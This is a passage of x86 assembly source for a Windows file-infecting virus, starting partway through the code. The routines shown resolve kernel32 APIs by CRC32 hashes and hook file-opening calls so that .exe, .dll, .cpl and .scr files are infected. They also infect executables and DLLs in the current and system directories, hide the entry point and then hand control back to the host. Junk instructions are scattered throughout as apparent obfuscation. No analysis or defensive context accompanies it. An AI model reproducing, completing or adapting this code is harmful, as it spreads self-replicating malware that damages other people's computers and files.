 call dword ptr [ebp+XGetSystemDirectoryA]
 mov eax, ebp
 add eax, offset DirectoryBuffer

 push eax
 call dword ptr [ebp+XSetCurrentDirectoryA]
 call InfectCurDir

                                        
 lea ebx, [ebp+OldDirectory]
 xchg ebx, eax

 push eax
 add ecx, ecx                           
 call dword ptr [ebp+XSetCurrentDirectoryA]

 jmp ExecuteHost

GATH:                                   
 pushad
                                        
 push 60d
 pop esi
 add esi, dword ptr [ebp+retBase]
                                        
 mov edx, 8510d
 sub edx, 8510d
 mov dx, word ptr [esi]
 add edx, dword ptr [ebp+retBase]
                                        
 cmp dword ptr [edx], 'EP'
 jne GATHnotfound
                                        
                                        
 push edx
 pop esi
                                        
 dec esi
 add esi, 129d
 mov esi, dword ptr [esi]
 add esi, dword ptr [ebp+retBase]

GATHK32Search:
 push esi
                                        
 mov esi, dword ptr [esi+0Ch]
 add esi, dword ptr [ebp+retBase]
 mov edi, offset K32_DLL
 add edi, ebp

                                        
 mov edx, ( 13d + 13d )
 sub edx, 13d
 push edx
GATHLoop2:
 mov bl, byte ptr [edi]
 cmp bl, byte ptr [esi]
 jne GATHLoop2NotEqual
                                        
 add esi, 1d
                                        
 inc edi
 add edx, -1
 or edx, edx
 jnz GATHLoop2
 pop edx
 pop esi
 jmp GATHFoundK32
GATHLoop2NotEqual:
 pop edx
 pop esi
                                        
 add esi, 20d
 jmp GATHK32Search
 sub dword ptr [ebp+Trash1], 1270516    

GATHFoundK32:                           
                                        
 cmp byte ptr [esi], 0h
 jz GATHnotfound
 mov ecx, dword ptr [esi+10h]
 add ecx, dword ptr [ebp+retBase]
                                        
 push ecx
 pop dword ptr [ebp+TempGetApi3]
 adc ebx, ebx                           
 mov ebx, dword ptr [esi]
                                        
 add esi, 4d
 or ebx, ebx
 jz GATHnotfound
                                        
                                        
 mov ecx, 0
 add ecx, ebx
 add ecx, dword ptr [ebp+retBase]
                                        
 mov ebx, 0
GATHloopy:
 cmp dword ptr [ecx], 0h
 jz GATHnotfound
 cmp byte ptr [ecx+03h], 80h
 jz GATHreloop
 mov edi, dword ptr [ebp+TempGetApi1]
                                        
 mov esi, dword ptr [ecx]
                                        
 add esi, 2d
 add esi, dword ptr [ebp+retBase]
 call CRC32
 mov eax, dword ptr [ebp+APICRC32]
 cmp dword ptr [edi], eax
 je GATHwegotit
GATHreloop:
                                        
 add ecx, 4d
                                        
 sub ebx, -1d
 or edx, edx
 jnz GATHloopy
GATHwegotit:
 inc edx                                
 push dword ptr [ebp+TempGetApi3]
 pop ecx
 shl ebx, 2
 add ebx, ecx
 mov ecx, dword ptr [ebx]
 xor edx, ecx                           
                                        
                                        
 sub edx, 91207982d                     
 mov dword ptr [ebp+TempGetApi2], 0
 add dword ptr [ebp+TempGetApi2], ebx
 mov dword ptr [ebp+TempGetApi1], 0
 sal edx, 23d                           
 add dword ptr [ebp+TempGetApi1], ecx
 popad
ret
GATHnotfound:
                                        
 mov edx, -28598d
 add edx, 28598d
 mov dword ptr [ebp+TempGetApi1], 0
 xor dword ptr [ebp+TempGetApi1], edx
 popad
ret

GetRand:                                
 pushad
 sub edx, dword ptr [ebp+RandVal]
 xor edx, dword ptr [ebp+NewEIP]
 add ecx, ebx                           
 mov dword ptr [ebp+RandVal], edx
 popad
 ret

HookAllAPIs:
 adc eax, ebx                           
 pushad
                                        
 lea ecx, [ebp+HookApi]
 xchg edx, ecx


HookNextApi:
                                        
 mov dword ptr [ebp+TempGetApi1], edx
 call GATH
                                        
 mov ebx, 0
 add ebx, -1d
 and ebx, dword ptr [ebp+TempGetApi1]
 add ebx, -1
 inc ebx
 jz HookNextApi2
                                        
 and eax, 0
 add eax, dword ptr [ebp+TempGetApi2]
                                        
 mov ecx, -6259d
 add ecx, 6259d
 add ecx, dword ptr [ebp+TempGetApi1]
 shr ebx, 10d                                                                 
 dec edx
 add edx, 5d                                 
 mov ebx, ebp
 add ebx, dword ptr [edx]
                                        
 mov dword ptr [edx+4], ecx
                                        
 mov dword ptr [eax], ebx
HookNextApi3:
                                        
 add edx, 8d
 cmp byte ptr [edx], 01h
 jne HookNextApi
 neg eax                                
 popad
ret
HookNextApi2:
                                        
 add edx, 4d
 jmp HookNextApi3
 rol ebx, 23d                           

CRC32:
 pushad
                                        
 mov ebx, esi
LenCRC:
                                        
 sub ebx, -1d
 cmp byte ptr [ebx], 0
 jne LenCRC
 sub ebx, esi
                                        
 mov edi, ebx
                                        
 add edi, 1d
 cld
                                        
 mov eax, 48458d
 sub eax, 48458d
 sub eax, 1
                                        
 mov ecx, eax
NextByteCRC:
                                        
 and ebx, 0
                                        
 sub edx, edx
 mov bl, byte ptr [esi]
                                        
 add esi, 1d
 xor bl, al
 mov al, ah
 mov ah, cl
 mov cl, ch
 mov ch, 8
NextBitCRC:
 shr dx, 1
 rcr bx, 1
jnc NoCRC
 xor bx,08320h
 xor dx,0EDB8h
NoCRC:
 dec ch
jnz NextBitCRC
 xor eax, ebx
 xor ecx, edx
 dec edi
jnz NextByteCRC
 not ecx
 not eax
 mov ebx, ecx
 rol ebx, 16d
 mov bx, ax
 mov dword ptr [ebp+APICRC32], 0
 sub dword ptr [ebp+Trash1], 858312     
 add dword ptr [ebp+APICRC32], ebx
 popad
ret

GenericHooker2:                         
 pushad
 pushfd
 call    GetDeltaOffset                                      
 mov edi, [esp+30h]
 jmp GenericHooker1_2
GenericHooker1:
 pushad
 pushfd
 call    GetDeltaOffset
                                        
 mov edi, [esp+2Ch]

GenericHooker1_2:                              
 sub ecx, ecx
 add ecx, edi
 sub ecx, 1
GenericHookLoop1:
                                        
 inc ecx
 cmp byte ptr [ecx], 0
 je ErrorGenericHooker
 cmp byte ptr [ecx], '.'
 jne GenericHookLoop1
                                        
 mov eax, dword ptr [ecx]
 or eax, 20202020h
 cmp eax, 'lpc.'
 je GenericHookerInfectIt
 cmp eax, 'exe.'
 je GenericHookerInfectIt
 cmp eax, 'lld.'
 je GenericHookerInfectIt
 cmp eax, 'rcs.'
 jne ErrorGenericHooker

GenericHookerInfectIt:                                        
 add ecx, 4d
 sub ebx, edi
                                        
 push ebx
 cmp ebx, 260d
 ja ErrorGenericHooker
 lea edx, [ebp+GHookBuffer]
 xchg edx, esi
 dec eax                                

GenericHookLoop2:
 mov dl, byte ptr [edi]
 mov byte ptr [esi], dl
                                        
 inc esi
                                        
 inc edi
 sub ebx, 1
 test ebx, ebx
 jnz GenericHookLoop2
 mov byte ptr [esi], 0
 lea ebx, [ebp+GHookBuffer]

 call FindFirstFileProc
 inc eax
                                        
 pop edx
 jz ErrorGenericHooker
                                        
 dec eax
 push eax
 call dword ptr [ebp+XCloseHandle]
 shr ecx, 6d                            
 
 lea eax, [ebp+GHookBuffer]
 lea esi, [ebp+WFD_szFileName]

GenericHookLoop3:
 mov cl, byte ptr [eax]
 mov byte ptr [esi], cl
                                        
 add esi, 1d
                                        
 add eax, 1d
 sub edx, 1
 cmp edx, 0
 jne GenericHookLoop3                                      

 call InfectFile


ErrorGenericHooker:
 popfd
 popad
 push ebp
 call GetDeltaOffset
 xchg eax, ebp
 pop ebp
ret

InfectCurDir:                           
 mov dword ptr [ebp+filemask+1], 'eXe.'
InfectCurDir2:
 lea ecx, [ebp+filemask]
 xchg ecx, ebx
 sar eax, 20d                           
                                        
 call FindFirstFileProc
                                        
 add eax, 1d
 sal ecx, 24d                           
                                        
 add eax, 1d
 dec eax
 jz EndInfectCurDir
                                        
                                        
 mov edx, 10d
 mov dword ptr [ebp+InfCounter], 0
 add dword ptr [ebp+InfCounter], edx

InfectCurDirFile:                       
 call InfectFile
                                        
 cmp [ebp+InfCounter], 0h
 jna EndInfectCurDir
                                        
 call FindNextFileProc
 cmp eax, 0
 jne InfectCurDirFile
 sbb ecx, 2d                            

EndInfectCurDir:
                                        
 push dword ptr [ebp+FindHandle]
 call dword ptr [ebp+XFindClose]
 cmp dword ptr [ebp+filemask+1], 'dLL.'
 je EndInfectCurDir2
 mov dword ptr [ebp+filemask+1], 'dLL.'
 jmp InfectCurDir2
 inc eax                                
EndInfectCurDir2:

ret

NoKernel:
 adc eax, 95423945d                     
                                        
                                        
 and ebx, 0
 xor ebx, dword ptr [ebp+OldEIP]

 mov dword ptr [ebp+retEIP], -1
 and dword ptr [ebp+retEIP], ebx

                                        
 push -1d
 pop eax
 and eax, dword ptr [ebp+EPOCount]

 neg ecx                                
 mov dword ptr [ebp+OldEPOCount], eax
                                    
 sub edi, edi
 add edi, dword ptr [ebp+OldBase]

 mov dword ptr [ebp+retBase], 0
 xor dword ptr [ebp+retBase], edi

ExecuteHost:                            
                                        
 dec ebp
 inc ebp
 jz FirstGenHost
 mov ebx,12345678h
 org $-4
 retEIP dd 0h
 add ebx,12345678h
 org $-4
 retBase dd 0h
                                        
                                        
 mov ecx, 53389d
 sub ecx, 53389d
 add ecx, dword ptr [ebp+OldEPOCount]
 cmp ecx, -1
 je DontRestoreHost
 add ebx, ecx
 mov byte ptr [ebx+4], 0C3h
 mov dword ptr [ebx], 0C95B5E5Fh
 popfd
 popad

 sub dword ptr [esp], 5
ret
DontRestoreHost:
 mov dword ptr [ebp+retJMP], ebx
 popfd
 popad

 db 068h                                
 retJMP dd 0h                           
 ret


CryptEnd:
EndVirus:


.code                                   
                                                                               
FCode:

 push offset VirusCode

 ret


FirstGenHost:                           
 push 0h
 call ExitProcess



end FCode


